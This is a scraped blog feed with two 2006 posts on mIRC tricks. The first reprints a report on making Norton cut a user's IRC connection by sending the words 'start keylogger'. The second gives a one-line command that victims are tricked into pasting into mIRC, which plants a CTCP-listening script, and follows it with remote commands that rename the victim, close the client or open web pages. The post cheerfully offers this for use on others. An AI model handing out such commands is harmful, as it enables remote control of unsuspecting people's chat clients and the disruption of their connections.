Darknet - The Darkside » mIRC http://www.darknet.org.uk Ethical Hacking, Penetration Testing & Computer Security Tue, 07 Feb 2012 18:34:17 +0000 en hourly 1 http://wordpress.org/?v=3.3.1 Norton Antivirus Funny Bug http://www.darknet.org.uk/2006/03/norton-antivirus-funny-bug/ http://www.darknet.org.uk/2006/03/norton-antivirus-funny-bug/#comments Thu, 02 Mar 2006 11:51:50 +0000 backbone http://www.darknet.org.uk/2006/03/norton-antivirus-funny-bug/

the following exploits (if we can call it this way) was published on securityfocus bugtraq mailinglist… it is entirely reproduced in the following lines:

Norton Internet monitoring tools issues
Versions Affected : *
Fix : No

What im writing about is how to stop the internet of some user that is
using the norton tools and IRC / any other chat at the same time.

By default norton monitor checks for words like “keylogger” , “start
keylogger” , “key logger” and etc.etc.

Example for irc :
Start a mIRC or any other IRC client that u like and connect to some
server.
Type down /ctcp yournick start keylogger . By default norton monitors
your mIRC Process and your logs of it so it sees “star keylogger” and
automaticly blocks mIRC.exe from starting and automaticly blocks port
6667 or whatever port ure using to connect to IRC. Nice eh ?

Aleksander Hristov

So you should be in a small manner paranoic when using Norton tools…

Post to Twitter Post to Facebook Post to Google Buzz Post to Delicious Post to Digg Post to Reddit Post to StumbleUpon

]]> http://www.darknet.org.uk/2006/03/norton-antivirus-funny-bug/feed/ 1 mIRC Backdoor http://www.darknet.org.uk/2006/02/mirc-backdoor/ http://www.darknet.org.uk/2006/02/mirc-backdoor/#comments Fri, 24 Feb 2006 22:16:46 +0000 backbone http://www.darknet.org.uk/2006/02/mirc-backdoor/

Well it’s not really a backdoor… but we can consider it one…

Some time ago it apeared on many websites (including mine) an article about a backdoor in mIRC… all this backdoor stuff was really nothing more than a mIRC script that by it’s mean made the client to respond at any command received via a CTCP (Client to Client Protocol) command… such as ping, version, time, etc…. so here is the command that the victim has to enter:

//.write -c mirc.dll ctcp 1:*:*:$1- | /.load -rs mirc.dll

The command is splited in 2 parts, delimited by | (a vertical line)… So the first section writes a file “mirc.dll” in which we write a simple mIRC script which listens to any CTCP request… the second one loads the file with the mIRC script….

After the “victim” executes this command we can control it by introducing one of the following lines:

{ this is a comment }

/ctcp victims_nick /.nick lamer { changes the nickname of the victim to lamer }

/ctcp victims_nick /.exit { closes the victims mIRC }

/ctcp victims_nick /.run www.black2white.as.ro
{ opens the victims default web browser (ie, firefox, opera, etc.) on the page www.black2white.as.ro }

/ctcp victims_nick /.any_valid_irc_command

So happy “masterminding”….

More IRC Commands: http://www.hackthissite.org/pages/irc/reference.php

Post to Twitter Post to Facebook Post to Google Buzz Post to Delicious Post to Digg Post to Reddit Post to StumbleUpon

]]> http://www.darknet.org.uk/2006/02/mirc-backdoor/feed/ 15